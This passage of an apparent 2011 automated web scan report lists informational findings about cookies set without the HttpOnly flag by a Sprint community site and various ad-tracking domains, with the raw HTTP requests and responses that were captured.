Path:	/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1=31342c323034353b31342c323130313b31342c323130323b31342c323032383b31342c323037333b; Expires=Tue, 04-Oct-2011 01:18:54 GMT; Path=/baw

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.42. http://community.sprint.com/baw/community/sprintblogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.sprint.com
Path:	/baw/community/sprintblogs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

jive.recentHistory.-1=31342c323130323b31342c323130313b; Expires=Tue, 04-Oct-2011 01:18:45 GMT; Path=/baw

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /baw/community/sprintblogs HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.43. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/44/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=7261694771272195332; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.44. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2966958661410417168; Domain=.audienceiq.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

12.45. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dm/mkt/3/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2644337228958821130; Domain=.mediabrandsww.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

12.46. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/2925993182975414771

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4018048898892878422; Domain=.p-td.com; Expires=Fri, 02-Mar-2012 00:48:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:48:08 GMT

GIF89a.............!.......,...........D..;

12.47. http://i.casalemedia.com/imp.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.casalemedia.com
Path:	/imp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMID=qPptfUPS1JUAAD6emfQAAAAa;domain=casalemedia.com;path=/;expires=Mon, 03 Sep 2012 00:53:06 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.48. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.49. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.50. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.51. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=b8sYO9aFHYIiGT8sQdwSkaMxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
GUID=MTMxNTA5ODM5NTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.52. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nmsacramento.112.2o7.net
Path:	/b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi_bax7Fmox7Emaibxxc=[CS]v4|27316752051606A2-400001778004310F|4E62CAD6[CE]; Expires=Fri, 2 Sep 2016 01:04:36 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.53. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111960; path=/; domain=.rubiconproject.com
csi15=3214998.js^2^1315097284^1315097639&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:53:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

12.54. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

12.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFOM9CLgIMVZ94v40baTDzlRIkdUWSQGfFxfA6hPpUKyeNNoj0iIN6Cv9sUGvLEXvKAFu9JT7uIABOODftm+QaDSbsuf25QFhAJtgIo+GwOzrVo4YkL0xbKLuQiu28WRitUy3Kb67rhK+xW853LY2RBECs8dSNYOibsRLGdMUdsI2f//Emd6k6iE1p2Wou0rWthgALXeX8ILkdmFAdhV3cQvpFqMGLq/eFx91Js8rLMz0cCNgkRarHvfvZ2ZEHYUfwWV/ukw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
udm_0=MLvvNSMJaSpn3g1FoZH0RlrFVGlLZikvZx25PXJmUCGL98grjFJqCCNpB/yeIe8tiuuU7DwV9uJRcKHDIz5sfLNLUI1v7CtFzyMjtMVqchuMirh+fVYDSTx6kYYD35s1jl+stYqc8GsQe73ckgkbu4VWrKeX2B7cZ/1seHrobMMUM7L5reZTF5m4zcGRkreyO0EKX5Wx+FYENxQ5/aj2i3QTfKgHhOu0nW8f+tcshhAFgqgczjwKnptz4DLwfWySzFP5wVwM+5ZURb4Sl1CQqxFIoYHaB2U9bktv+VgMOU1ZBee+imwg7hUw1OM10Z7Em8yut0h38HT+0e404C0cOgQ24hBYw+TwFcPjx+ASIPZ36/rWPXN2lf6nqHyamgPG4SqEkq2WG8fzc0B9GkS0nT8ZVWwOabJvEkykzFF/+8Xxh/nYZE24yORkcXIy5PEin+j+o4l6I1NJAcwDJ8vbDb/MmtGGNaqd4AwDZ2Ijc/ZToTiK4Aukkj/LvsuziPG4IRvM8nf6rJbqLkWwFcaoXY7vUst/Gg7Xa/xavuUFDKvbHfCv+1yPk1dz/PYvygr/Rk6zsIJQ0P6z3IwJM+in9OuPRJ7QjHK7ndiF0mmCNutid8vPaEnygJPqBzs8EBCS1ptxgc9OPXaSPNOKhLwQxDDEpVmulh6B5oui82z2SVApQ+wHGfpaE6FtnRZDJmB4Lu3g88cANQsQfz22xW2pBk3b2fh0eYCd+/SrmquMLKZIXY06i4xZwMRGHhgPLCUALAq30j4PGNG8Lbs9O2o6pNGNryL/rXvzbEoDigpJG/nBFqh5HNOUAogER7G+UaHbFrPGha5Y+7kZW/nX50pKipg1eovzW42n/IOT7s0hqTfUt28mej2z+FtSCUM+L6+DOlRsWrQSt8O1Kq+P9ltbJmQtL5TUx2Lgd+Bs9sQsWdHWq+XJbVGcxXX5x5elPlkKPibM4IAdr0tgvSiBju8YRaVhLjbin/Y11hrducFcz94sD8qVh5g6z0VOhRdx4D6z0K8VoqgdqQaEAPBw5MwfMp8KaH64wOmvQxMYEBvDsc5uANyIHQHbFXbGz51NIVTekUt9BdWxFLyXvli2OK+iH/+O6NeH3pqas2pk/Tu07l/CoXE0ZEV80c/FleVQoq1ZQY3G9OSTCcZMQVECZND0NsMxYGPs0BohuXdlJw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.56. http://pix04.revsci.net/D08734/a1/0/3/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
udm_0=MLvvMC8OYS5rXbhG0229qE0ZZfVJSgtZ3qm5UxlJJg5z0SgJjDXMFNBaSH5FXKC5uMqMAYe3LnBJoN6KPJ5HmNpTftzasLOHbXUlexEySdBWwp2Urdu/CXqTkn9cRAWShk8yvFMXXiZeKesq7T/19NheQTJDBBTk2qlhMbrFQpzyNaoubYDZepM0IRpzBbvFPy+RadE3K99sIyt19cE/FUnJXUWZ3rLpRhaqLQCuQnEUYKNgfxIroIgJOs97SEJzE5B8ZRKDjSjhO2Ul6pM1TT9m9fBJkQqq/I7he/sHSigrXjyTu/VjAn9g/UmRqoEMBmneape7UJpZttpKR94xyX4KIDp3dXMB/aMPHiYrjInN8zABRWWvjEldLk+gLcPrnIyAg9jsTsxqTXRWlJxdEhIXhBkuzmqecbK9Uol+ctG7vC2Di7U7vzvvmCl0KqyGN1s7jkATO13CT2AfTAj/2luWCZVEmru9XxLnzj8fVJ5qz2UjxOsOlVzXP1yaE6Yyz1q1bKnPVjC0z3RzAXYKtpBi4m1d1V4ps/12UOJl01RfH9Gv1ghVttQC7jd7y5eMBOdQpwlmW8m90g8peBVGtUjfGGcW+RMFhTBwciO3VAk3eLwGXIswRNpdrTYdgOLvqVAdHjKkRvS4u1c46i99S30PU14kF4lRsnIfXwUNmI8cxApAit9XGXI5hLKF//4eAsPFdcUdKLGku2Vyx3spIyCzJrke3Zm1lmWoeTZKTTn/dXO0VEg7yML/KhsJCFmJNEd1iOyPU9Pe1hqCLYPT8D685EyF; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvMC8OYS5rXbhG0229qE0ZZfVJSgtZ3qm5UxlJJg5z0SgJjDXMFNBaSH5FXKC5uMqMAYe3LnBJoN6KPJ5HmNpTftzasLOHbXUlexEySdBWwp2Urdu/CXqTkn9cRAWShk8yvFMXXiZeKesq7T/19NheQTJDBBTk2qlhMbrFQpzyNaoubYDZepM0IRpzBbvFPy+RadE3K99sIyt19cE/FUnJXUWZ3rLpRhaqLQCuQnEUYKNgfxIroIgJOs97SEJzE5B8ZRKDjSjhO2Ul6pM1TT9m9fBJkQqq/I7he/sHSigrXjyTu/VjAn9g/UmRqoEMBmneape7UJpZttpKR94xyX4KIDp3dXMB/aMPHiYrjInN8zABRWWvjEldLk+gLcPrnIyAg9jsTsxqTXRWlJxdEhIXhBkuzmqecbK9Uol+ctG7vC2Di7U7vzvvmCl0KqyGN1s7jkATO13CT2AfTAj/2luWCZVEmru9XxLnzj8fVJ5qz2UjxOsOlVzXP1yaE6Yyz1q1bKnPVjC0z3RzAXYKtpBi4m1d1V4ps/12UOJl01RfH9Gv1ghVttQC7jd7y5eMBOdQpwlmW8m90g8peBVGtUjfGGcW+RMFhTBwciO3VAk3eLwGXIswRNpdrTYdgOLvqVAdHjKkRvS4u1c46i99S30PU14kF4lRsnIfXwUNmI8cxApAit9XGXI5hLKF//4eAsPFdcUdKLGku2Vyx3spIyCzJrke3Zm1lmWoeTZKTTn/dXO0VEg7yML/KhsJCFmJNEd1iOyPU9Pe1hqCLYPT8D685EyF; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:14 GMT
Content-Length: 444

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72861','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126
...[SNIP]...

12.57. http://pix04.revsci.net/F09828/a4/0/0/0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:56 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

12.58. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I07714/b3/0/3/1008211/304415100.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPFOMnC7gMMU594t/Sn7ey31RI0YjFJAbeHbXhIfrk4Ow++ZH8gIQtYr8iWg2RZvh/nqSuFNyBKWw8Xyc7c/RIna/1WF9Q8p6WStaYJPam7yG21EA//kgEQ6MuyzqUKz7IUGE71nqp5Au9VMkKc/okTNLTXO89O6DKukkzJFi3MA0P6larBAMm1+anARqSwCEH+pmFjv+pITclEQ9S5f07ns5ipgm0hyliLId0YqoxKyXj/KVYnPmJ3S57oyns/3A==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
rtc_wRZH=MLsvsKMucD5nJRGm+X48W1s+JnWw2pAhBM0cosZtfJ9ViXcJRkBPy031UQhZHBj2vSo7My1zYrWwcschx0t7TSkF8tieuR/3XAVwFM0lt/amf/M8PVJdtTynoppWQLwUyw+nQ4vnPoZ4ecjmuzsYWm/I2N73KKVfeX8CHvaFRB/odeHTVhMokPrgK0qQ+4F3yU2W660bYz6wEhP5v4RYC/mf52PIfQqOyndNLJkQCFD+6kkfncm9CKn0SA3XJsqyB7uYxqUSa1VKB2R0mTF1Ysy+cH5CU7aekURYILu4a+PbQ0i+M6NDTvAB/ZnFaR0vRSvwLSTwhp/efqpVeBpt7fymb4N5xV/bBbuIdvrIVZNthFUL8XeqVq3HZxhXhVSm+7A7svJUS5WwVMRvjIc4MEZPO4teely4a6ukWwMIWcaNZJCu8pdF3Xk+rpnQ6GfVFyq9jR0AvAhLLm6Ma1/MjwM=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.59. http://pix04.revsci.net/J06575/a4/0/0/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:50 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

12.60. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/J06575/b3/0/3/1008211/66697159.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZkg8RmyafY39+OIzF9755x3W+AzJvvU=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:54 GMT; Path=/
